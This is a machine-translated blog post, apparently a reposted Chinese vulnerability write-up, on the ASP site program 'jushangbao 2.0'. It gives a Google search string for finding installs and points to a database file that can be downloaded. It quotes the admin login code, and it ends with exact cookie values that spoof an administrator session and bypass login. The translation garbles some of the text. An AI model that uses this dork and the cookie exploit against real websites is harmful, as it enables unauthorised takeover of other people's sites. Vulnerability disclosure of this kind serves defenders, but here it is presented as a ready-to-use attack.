FROM www.st999.cn/blog BY long time computer
Program: jushangbao 2.0
Google Keyword: intext: technical support: benming technology jushangbao
A few days ago, I met a program called jushangbao and downloaded the source code. Today, I have a simple look at it...
Vulnerabilities: brute-force library and background cookie Spoofing
1) directly access the conn/conn. asp exposed database address, download, decrypt, and log on to the background
2) Cookie spoofing: the code snippets in the check. asp file in the admin Folder:
Dim uid, upwd www.2cto.com
Uid = Replace_Text (Request. Form ("userid "))
Upwd = md5 (Replace_Text (Request. Form ("password"), 16)
Verifycode = Replace_Text (request. Form ("verifycode "))
If not isnumeric (Verifycode) then
Call Logerr ()
Call ErroFy ()
End if
If Cint (Verifycode) <> Session ("SafeCode") then
Call ErroFy ()
Sub ErroFy ()
Response. write "<table cellpadding = 2 cellspacing = 1 border = 0 width = 100% class = tableBorder align = center>"
Response. write "<TR>"
Response. write "<TH class = tableHeaderText colSpan = 2 height = 25> error prompt </TH>"
Response. write "<TR> <tr> <td height = 85 valign = top class = forumRow> <div align = center> <br> Incorrect verification code! </Div> </td> </tr>"
Response. write "<tr align = center> <td height = 30 class = forumRowHighlight> <a href = 'login. asp '> & lt; return to the previous page </a> </td>"
Response. write "</tr>"
Response. write "</table>"
Response. End ()
End Sub
Else
Set rs = server. createobject ("adodb. recordset ")
Sqltext = "select * from benming_master where Username = '" & uid & "' and [PassWord] = '" & upwd &"'"
Rs. open sqltext, conn, 1, 1
If Rs. Eof And Rs. Bof Then
Response. write "<table cellpadding = 2 cellspacing = 1 border = 0 width = 100% class = tableBorder align = center>"
Response. write "<TR>"
Response. write "<TH class = tableHeaderText colSpan = 2 height = 25> error prompt </TH>"
Response. write "<TR> <tr> <td height = 85 valign = top class = forumRow> <div align = center> <br> incorrect login name or password! </Div> </td> </tr>"
Response. write "<tr align = center> <td height = 30 class = forumRowHighlight> <a href = 'login. asp '> & lt; return to the previous page </a> </td>"
Response. write "</tr>"
Response. write "</table>"
Else
Response. Cookies ("globalecmaster") = rs ("username ")
Response. Cookies ("masterflag") = rs ("flag ")
Response. Cookies ("adminid") = rs ("id ")
LastLogin = Date ()
LastLoginIP = getIP ()
SQL = "update benming_master set LastLogin = '" & LastLogin & "', LastLoginIP = '" & LastLoginIP & "'where username ='" & uid &"'"
Conn.exe cute (SQL)
Response. write "<table cellpadding = 2 cellspacing = 1 border = 0 width = 100% class = tableBorder align = center>"
Response. write "<TR>"
Response. write "<TH class = tableHeaderText colSpan = 2 height = 25> logon success prompt </TH>"
Response. write "<TR> <tr> <td height = 85 valign = top class = forumRow> <div align = center> <br> the website administrator is successfully authenticated! <Br> automatically enters the background in 2 seconds... </div> </td> </tr>"
Response. write "<tr align = center> <td height = 30 class = forumRowHighlight> <a href = 'index. asp '> go to the background management </a> </td>"
Response. write "</tr>"
Response. write "</table>"
%>
<Meta HTTP-EQUIV = refresh Content = '2; url = index. asp '>
<%
End if
Rs. close
Set rs = nothing
End if
Method of exploits: access the background directly with AD, modify the following cookie, and then Access admin/index. asp to log on.
Globalecmaster = admin; masterflag = 01% 2C % 2002% 2C % 2003% 2C % 2004%
2C % 2005% 2C % 2006% 2C % 2007% 2C % 2008% 2C % 2009% 2C % 20010; adminid = 1